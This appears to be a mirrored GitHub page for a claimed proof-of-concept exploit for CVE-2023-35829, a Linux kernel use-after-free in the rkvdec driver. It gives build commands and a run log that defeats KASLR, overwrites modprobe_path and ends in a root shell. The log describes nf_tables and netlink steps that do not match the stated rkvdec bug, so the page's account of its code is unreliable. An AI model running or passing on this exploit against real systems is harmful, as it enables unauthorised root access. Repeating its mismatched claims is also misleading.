Giters

apkc / CVE-2023-35829-poc

CVE-2023-35829 Linux kernel before 6.3.2. A use-after-free was found in rkvdec_remove in drivers/staging/media/rkvdec/rkvdec.c.

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2023-35829-poc

CVE-2023-35829 Linux kernel before 6.3.2. A use-after-free was found in rkvdec_remove in drivers/staging/media/rkvdec/rkvdec.c.

Usage

chris@experience:~/CVE-2023-35829-poc# make
cc -pthread -static -o poc obj/keyring.o obj/main.o obj/modprobe.o obj/netlink.o obj/nf_tables.o obj/simple_xattr.o obj/uring.o obj/util.o
strip poc
cc -o get_root get_root_src/get_root.c
rm -fr get_root
chris@experience:~/CVE-2023-35829-poc# ./poc
[+] CVE-2023-35829 PoC
[+] Second process currently waiting
[+] Get CAP_NET_ADMIN capability
[+] Netlink socket created
[+] Netlink socket bound
[+] Table table created
[+] Set for the leak created
[+] Set for write primitive created
[+] Leak succeed
[+] kaslr base found 0xffffffff9f000000
[+] physmap base found 0xffff910a00000000
[+] modprobe path changed !
[+] Modprobe payload setup
[?] waitpid
[?] sem_post
[+++] Got root shell, should exit?
# id
uid=0(root) gid=0(root) groups=0(root)

About

CVE-2023-35829 Linux kernel before 6.3.2. A use-after-free was found in rkvdec_remove in drivers/staging/media/rkvdec/rkvdec.c.

License:GNU General Public License v3.0

Languages

Language:C 98.7%Language:Makefile 1.3%